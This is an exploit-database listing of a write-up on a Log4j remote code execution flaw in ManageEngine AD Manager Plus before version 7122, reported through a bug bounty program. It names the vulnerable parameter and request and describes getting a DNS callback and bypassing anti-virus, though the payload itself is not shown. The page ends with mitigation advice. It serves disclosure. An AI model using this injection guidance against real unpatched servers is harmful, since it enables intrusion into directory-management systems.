AD Manager Plus 7122 Remote Code Execution

🗓️ 03 Apr 2023 00:00:00Reported by Chan Nyein Wai, Thura Moe MyintType

packetstorm🔗 packetstormsecurity.com👁 392 Views

AD Manager Plus 7122 Remote Code Execution vulnerability and Log4j exploi

Reporter	Title	Published	Views	Family All 1396
GithubExploit	Exploit for Uncontrolled Resource Consumption in Siemens 6Bk1602-0Aa12-0Tp0_Firmware	17 Dec 202108:32	–	githubexploit
GithubExploit	Exploit for Uncontrolled Resource Consumption in Siemens 6Bk1602-0Aa12-0Tp0_Firmware	11 Dec 202116:08	–	githubexploit
GithubExploit	Exploit for Uncontrolled Resource Consumption in Siemens 6Bk1602-0Aa12-0Tp0_Firmware	15 Dec 202113:14	–	githubexploit
GithubExploit	Exploit for Uncontrolled Resource Consumption in Siemens 6Bk1602-0Aa12-0Tp0_Firmware	11 Mar 202212:43	–	githubexploit
GithubExploit	Exploit for Uncontrolled Resource Consumption in Siemens 6Bk1602-0Aa12-0Tp0_Firmware	19 Mar 202615:19	–	githubexploit
GithubExploit	Exploit for Uncontrolled Resource Consumption in Siemens 6Bk1602-0Aa12-0Tp0_Firmware	7 Mar 202410:04	–	githubexploit
GithubExploit	Exploit for Uncontrolled Resource Consumption in Siemens 6Bk1602-0Aa12-0Tp0_Firmware	12 Dec 202113:59	–	githubexploit
GithubExploit	Exploit for Uncontrolled Resource Consumption in Siemens 6Bk1602-0Aa12-0Tp0_Firmware	12 Dec 202111:26	–	githubexploit
GithubExploit	Exploit for Uncontrolled Resource Consumption in Siemens 6Bk1602-0Aa12-0Tp0_Firmware	12 Dec 202115:29	–	githubexploit
GithubExploit	Exploit for Uncontrolled Resource Consumption in Siemens 6Bk1602-0Aa12-0Tp0_Firmware	12 Dec 202112:27	–	githubexploit

`# Exploit Title: AD Manager Plus 7122 - Remote Code Execution (RCE)  
# Exploit Author: Chan Nyein Wai & Thura Moe Myint  
# Vendor Homepage: https://www.manageengine.com/products/ad-manager/  
# Software Link: https://www.manageengine.com/products/ad-manager/download.html  
# Version: Ad Manager Plus Before 7122  
# Tested on: Windows  
# CVE : CVE-2021-44228  
# Github Repo: https://github.com/channyein1337/research/blob/main/Ad-Manager-Plus-Log4j-poc.md  
  
### Description  
  
In the summer of 2022, I have been doing security engagement on Synack  
Red Team in the collaboration with my good friend (Thura Moe Myint).  
At that time, Log4j was already widespread on the internet. Manage  
Engine had already patched the Ad Manager Plus to prevent it from  
being affected by the Log4j vulnerability. They had mentioned that  
Log4j was not affected by Ad Manager Plus. However, we determined that  
the Ad Manager Plus was running on our target and managed to exploit  
the Log4j vulnerability.  
  
### Exploitation  
  
First, Let’s make a login request using proxy.  
  
Inject the following payload in the ```methodToCall``` parameter in  
the ```ADSearch.cc``` request.  
  
Then you will get the dns callback with username in your burp collabrator.  
  
  
  
  
### Notes  
  
When we initially reported this vulnerability to Synack, we only  
managed to get a DNS callback and our report was marked as LDAP  
injection. However, we attempted to gain full RCE on the host but were  
not successful. Later, we discovered that Ad Manager Plus was running  
on another target, so we tried to get full RCE on that target. We  
realized that there was a firewall and an anti-virus running on the  
machine, so most of our payloads wouldn't work. After spending a  
considerable amount of time , we eventually managed to bypass the  
firewall and anti-virus, and achieve full RCE.  
  
### Conclusion  
  
We had already informed Zoho about the log4j vulnerability, and even  
after it was fixed, they decided to reward us with a bonus bounty for  
our report.  
  
### Mitigation  
  
Updating to a version of Ad Manager Plus higher than 7122 should  
resolve the issue.  
  
`

03 Apr 2023 00:00Current

8.9High risk

Vulners AI Score8.9

CVSS 29.3

CVSS 3.110

EPSS0.94358